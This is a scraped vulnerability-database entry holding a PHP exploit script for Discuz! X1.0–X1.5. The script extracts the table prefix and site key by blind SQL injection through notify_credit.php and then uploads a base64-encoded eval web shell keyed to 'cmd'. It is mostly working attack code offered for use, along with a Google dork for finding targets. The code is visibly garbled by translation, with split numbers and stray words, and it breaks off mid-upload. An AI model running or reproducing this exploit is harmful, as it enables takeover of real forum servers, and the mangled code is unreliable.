Discuz! X1.0 – X1.5 Blind SQL injection exploit & Get Shell – vulnerability warning – the black bar safety net

2012-04-08T00:00:00
ID MYHACK58:62201233600
Type myhack58
Reporter 佚名
Modified 2012-04-08T00:00:00

Description

Exploit Title: [Discuz! X1.0 - X1.5 Blind SQL injection exploit & Get Shell]

Date: [06-04-2012]

Author: [Hacker-Fire]

Category: [webapps]

Google dork: [Powered by Discuz]

Tested on: [Windows 7]

[~] P0c [~] :

<? Php

print_r ('

+ ------------------------------------------------- -------------------------- +

Discuz! 1-1. 5 notify_credit.php Blind SQL injection exploit By Hacker-Fire

Description: follow-up getshell add the code down

+ ------------------------------------------------- -------------------------- +

');

if($ argc <2) {

print_r ('

+ ------------------------------------------------- -------------------------- +

Usage: php '$ argv [0].' Url [pre]

Example:

php '$ argv [0].'http://localhost/ in the

php '. $ argv [0].'http://localhost/ xss_

+ ------------------------------------------------- -------------------------- +

');

exit;

}

error_reporting(7);

the ini_set('set max_execution_time large', 0);

$ Url = $ argv [1];

$ Pre = $ argv [2]? $ Argv [2]: 'pre_';

$ Target = parse_url($ url);

extract ($ target);

$ Path1 = $ path. '/ Api / trade / notify_credit.php';

$ Hash = array();

$ Hash = the array_merge($ hash range (4 8, 5 7));

$ Hash = the array_merge($ hash range (9 7, 1 0 2));

$ Tmp_expstr = "'";

$ Res = send ();

if(strpos($ res, 'SQL syntax') == false) {var_dump ($ res); die('Oooops. I can NOT hack it.');}

preg_match ('/ FROM \ s ([a-zA-Z_] +) forum_order /', $ res, $ match);

if($ the match [1]) $ the pre = $ match [1];

$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$ pre} common_setting WHERE" ='";

$ Res = send ();

if(strpos($ res, "does not exist") == false) {

echo"Table_pre is WRONG! \ nReady to Crack It. Please Waiting .. \ n";

for($ i = 1; $ i <2 0; $ i + +) {

$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema. the columns WHERE table_schema = database () AND table_name LIKE'% forum_post_tableid% 'AND LENGTH (REPLACE ( table_name, 'forum_post_tableid',")) = $ i AND" = '";

$ Res = send ();

if(strpos($ res, 'SQL syntax')! == false) {

$ Pre =";

$ Hash2 = array();

$ Hash2 = array_merge($ hash2 range (4 8, 5 7));

$ Hash2 = array_merge($ hash2, range (9 7, 1 2 2));

$ Hash2 [] = 9 5;

for($ j = 1; $ j <= $ i; $ j++) {

for($ k = 0; $ k <= 2 5 5; $ k + +) {

if(in_array ($ k, $ hash2)) {

$ Char = dechex($ k);

$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema. the columns WHERE table_schema = database () AND table_name LIKE'% forum_post_tableid% 'AND MID (REPLACE ( table_name, 'forum_post_tableid',"), $ j, 1) = 0x {$ char} AND" = '";

$ Res = send ();

if(strpos($ res, 'SQL syntax')! == false) {

echochr($ k);

$ The pre = chr($ k); the break;

}

}

}

}

if(strlen($ pre)) {echo"\ nCracked ... Table_Pre:". $ pre. "\ n"; break;} else{die('GET Table_pre Failed ..');};

}}};

echo"Please Waiting.... \ n";

$ Sitekey =";

for($ i = 1; $ i <= 3 2; $ i + +) {

for($ k = 0; $ k <= 2 5 5; $ k + +) {

if(in_array ($ k, $ hash)) {

$ Char = dechex($ k);

$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$ pre} common_setting WHERE skey = 0x6D795F736974656B6579 AND MID (svalue, {$ i}, 1) = 0x {$ char} AND" = '";

$ Res = send ();

if(strpos($ res, 'SQL syntax')! == false) {

echochr($ k);

$ Sitekey. = Chr($ k); break;

}}}}

/ *

By: alibaba

Modify andadd some code, andifsuccessful will be able to gain the shell

The word secret is: cmd

  • /

if(strlen($ sitekey)! = 3 2)

{

echo"\ nmy_sitekey not found. try blank my_sitekey \ n";

}

elseecho"\ nmy_sitekey: {$ sitekey} \ n";

echo"\ nUploading Shell ...";

$ Module = 'video';

$ Method = 'authauth';

$ Params = 'a: 3: {i: 0; i: 1; i: 1; s: 3 6: "PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7pz4 ="; i: 2; s: 3: "php";}';
